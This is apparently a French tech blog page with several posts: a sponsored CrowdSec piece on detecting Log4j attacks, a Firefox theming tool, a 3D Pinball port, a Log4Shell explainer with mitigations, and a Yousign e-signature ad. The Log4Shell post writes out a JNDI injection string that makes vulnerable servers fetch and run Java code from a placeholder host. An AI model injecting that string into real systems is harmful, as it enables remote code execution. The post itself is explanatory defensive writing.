Mise à jour de la base de données, veuillez patienter...

— En partenariat avec Crowdsec —

Si vous travaillez dans le domaine de la cybersécurité, vous avez probablement passé un très mauvais week-end.

Et ce, à cause de la découverte de la vulnérabilité zero-day Log4j (CVE-2021-44228).

L’équipe CrowdSec s’est retroussé les manches pour développer un scénario capable de détecter et bloquer les tentatives d’exploitation de cette vulnérabilité. Vous pouvez le télécharger directement depuis le Hub de CrowdSec et l’installer en un clin d’œil. 

L’efficacité de CrowdSec se basant sur le pouvoir de la foule, et à la lumière de la taille de leur communauté en pleine expansion, la solution a déjà collecté un grand nombre d’adresses IP qui tentant d’exploiter la vulnérabilité. Vous pouvez consulter la liste ici. Elle est très fréquemment mise à jour et il va sans dire que vous devriez bloquer sans attendre celles qui sont marquées comme « validated ».

Ces adresses IP ont été sélectionnées par l’algorithme de consensus de la solution, ce qui signifie qu’elles ont reçu de nombreux votes défavorables de la part de leur réseau d’utilisateurs. Celles qui sont marquées comme “not enough data” sont très suspectes mais peuvent encore contenir quelques faux positifs. Les adresses classées dans la catégorie « benign » sont utilisées par des personnes qui sont généralement du bon côté de la force, pour aider, scanner, et non à des desseins malfaisants. 

Vous pouvez également utiliser leur mode replay, ou forensics, pour analyser les logs de vos serveurs afin de vérifier si une exploitation Log4j a été tentée sur l’une de ces IP, par qui et quand, en utilisant le scénario approprié et la ligne de commande ci-dessous :

sudo cscli hub update
sudo cscli scenarios install crowdsecurity/apache_log4j2_cve-2021-44228
sudo systemctl reload crowdsec

# sudo crowdsec --dsn "file://<log_file_path>" -no-api --type <log_type>
sudo crowdsec --dsn "file:///var/log/nginx/access.log" -no-api --type nginx

sudo cscli alerts list --scenario crowdsecurity/apache_log4j2_cve-2021-44228

Si vous souhaitez accéder à plus de détails concernant cet IPS open source et collaboratif, qui est capable de détecter et bloquer de nombreux comportements malveillants, tout en vous permettant de collaborer entre cyber défenseurs en échangeant les IPs bloquées, visitez leur site web ou leur dépôt GitHub. 

Courageux résistants qui utilisent encore Firefox, voici un super outil pour le personnaliser à fond !

Ça s’appelle Firefox Color et une fois l’extension installée, il vous suffit de jouer avec les paramètres de couleurs pour créer le thème Firefox qui vous correspond. Couleur de la barre d’onglets, couleur de fond, couleur du champs de recherche, couleur des tooltips…etc. Tout est modifiable !

Vous pouvez même uploader une image pour l’avoir en fond dans la barre d’onglets. Par exemple, j’ai fait un petit thème spécial Noël :

Firefox Color est très sympa puisqu’il vous permet de vous faire un petit Firefox custom mais également d’exporter vos œuvres pour les proposer à votre communauté, famille, amis…etc.

N’hésitez pas à partager vos thèmes ici aussi ! Et si vous n’avez pas d’inspiration, il y a un gros bouton RANDOM en haut qui permet d’avoir des résultats souvent moches mais parfois agréablement surprenant.

Est-ce que vous vous souvenez de 3D Pinball sous Windows ? Créé en 1995, ce jeu était disponible d’origine d’abord dans Windows 95 Plus! jusqu’à Windows XP. Il s’agissait en réalité d’une version de Full Tilt! Pinball édité par Maxis (Sim City) avec la table Space Cadet.

Ensuite, avec l’arrivée de Windows Vista, ce jeu a été abandonné à cause d’un bug au niveau de la détection des collisions dans la version 64 bits. Mais la bonne nouvelle c’est que vous allez pouvoir y rejouer grâce à ce portage de k4zmu2a qui a totalement reversé 3D Pinball : Space Cadet à l’aide de Ida et Ghidra.

À partir de là, il est possible de télécharger ou compiler une version pour Windows, Linux et macOS.

D’autres portages sont également disponibles pour la Nintendo Switch, Android, PS Vita, 3DS, Wii et Wii U.

Et si vous avez la flemme de le compiler, vous pouvez même jouer à une version en ligne ici.

Si vous vous intéressez un peu à la sécurité informatique, il ne vous aura pas échappé que le 9 décembre dernier, une faille 0day touchant Apache Log4j avait été divulguée. Baptisée Log4Shell, cette faille qui touche log4j de la version 2.0 à 2.14.1 a obtenu un score CVSS de 10/10 en matière de gravité.

Woohoo.

Ça transpire fort un peu partout surtout que la faille est actuellement utilisée un peu partout. Pour vous la faire courte, il suffit de réussir à faire passer dans les logs analysés par log4j les caractères suivants.

${jndi:ldap://URL.com/FICHIER_JAVA}

et cela aura pour effet de télécharger et exécuter le fichier java qui est au bout de l’url « URL.com/FICHIER_JAVA ». C’est aussi simple que dramatique.

Il y a beaucoup de littérature là-dessus notamment du côté du CERT-FR donc je ne vais pas m’étaler sur le sujet, mais un projet Github intéressant et amusant est né de tout ce bordel.

Vous le savez, pour patcher cette vulnérabilité Log4Shell (CVE-2021-44228), il faut de toute urgence mettre à jour log4j vers une version >= 2.15.0.

Et si ce n’est pas possible :

Pour les applications utilisant les versions 2.10.0 et ultérieures de la bibliothèque log4j, il est également possible de se prémunir contre toute attaque en modifiant le paramètre de configuration log4j2.formatMsgNoLookups à la valeur true, par exemple lors du lancement de la machine virtuelle Java avec l’option -Dlog4j2.formatMsgNoLookups=true. Une autre alternative consiste à supprimer la classe JndiLookup dans le paramètre classpath pour éliminer le vecteur principal d’attaque (les chercheurs n’excluent pas l’existence d’un autre vecteur d’attaque).

Cert FR

Mais une autre possibilité consiste à laisser faire la nature et c’est ce que propose Cybereason avec ce code baptisé Logout4Shell qui exploite la vulnérabilité Log4Shell pour… la patcher tout simplement.

Le payload qui est chargé via la faille va forcer l’enregistreur Log4j à se reconfigurer pour basculer le paramètre qui va bien sur True et empêchera ainsi toute exploitation ultérieure via cette attaque.

C’est un genre de cyber vaccin en attendant une vraie mise à jour de Log4j.

Si cela vous intéresse, le code est dispo sur Github.

Bon courage à ceux qui sont impactés.

— En partenariat avec Yousign —

Un gain de temps phénoménal

Avec la généralisation du télétravail, mais également des rendez-vous en visioconférence, les entreprises ont dû se mettre à la signature électronique massivement.

En effet, grâce à la signature électronique, on évite d’imprimer d’épais documents sur papier, de les scanner pour les envoyer par email ou par la Poste. Et ainsi tout peut se faire à distance, de manière totalement transparente et sécurisée. C’est un gain de temps phénoménal !

Concrètement, il n’y a que des avantages avec la signature électronique. Que ce soit pour approuver un devis ou signer les documents d’une assemblée générale, tout se fait en douceur et rapidement. Pour l’utiliser régulièrement, je peux vous dire que c’est vraiment plus confortable de parapher et signer des centaines de pages d’un seul clic plutôt qu’avec un bon vieux stylo et il est beaucoup plus simple de recueillir les signatures de tout le monde sur plusieurs documents en même temps, surtout si tout le monde est éparpillé aux quatre coins de la France.

Pour les clients à qui vous faites signer des devis par exemple, c’est également un super confort, car ils peuvent signer le document depuis n’importe où et à partir de n’importe quel ordinateur, tablette ou smartphone. Cela vous permet de conclure des contrats plus rapidement et donc d’augmenter votre efficacité commerciale.

Une sécurité renforcée

Et comme tout est dématérialisé, les documents sont envoyés automatiquement à toutes les parties et peuvent être conservés en lieu sûr ou intégrés dans vos processus techniques et chacun est informé lorsque toutes les signatures ont été collectées. L’absence de papier dans le processus permet également d’économiser des coûts d’impression, d’envoi, de déplacement…etc et donc de réduire un petit peu votre empreinte écologique. Plus de papier, plus de transport et moins de temps perdu !

Côté sécurité, la signature électronique garantit à la fois l’authenticité de la signature et l’intégrité du document grâce à du chiffrement et à des processus d’identification des signataires. Ainsi, il devient impossible de falsifier une signature électronique ou de modifier un document déjà signé. C’est un énorme avantage !

Sans parler du fait qu’un document papier peut-être volé ou perdu. Avec des documents sécurisés dans le cadre d’une signature électronique, ce risque devient presque nul.

Yousign – La référence en Europe

Si pour vous, la sécurité et la légalité de la signature électronique sont des facteurs importants, je vous invite à tester Yousign. Ainsi vous saurez comment faire une signature électronique très simplement, en profitant de leur offre d’essai de 14 jours.

Yousign est une solution de signature électronique française qui respecte le cadre juridique européen et qui est vraiment bien pensée. Tout le processus de création de documents, d’envoi et de signature est optimisé pour vous prendre le moins de temps possible.

En quelques clics, vos documents sont mis en ligne, et les signataires sont prévenus. Les relances pour les têtes en l’air sont automatiques et vous pouvez suivre en temps réel les invitations à signer.

Évidemment, Yousign a fait de la sécurité sa priorité numéro 1 et répondra à tous vos besoins de confidentialité et de traçabilité. La solution est d’ailleurs certifiée eIDAS (Electronic IDentification Authentication and trust Services), un règlement de l’UE sur l’identification électronique et les services de confiance pour les transactions électroniques au sein de l’Union Européenne). Elle intègre évidemment de l’authentification forte (OTP), du stockage chiffré et sécurisé et toutes les preuves sont horodatées et archivées sur la plateforme.

Ainsi, tous les signatures et documents signés via Yousign seront 100% légaux et sécurisés.

À découvrir ici.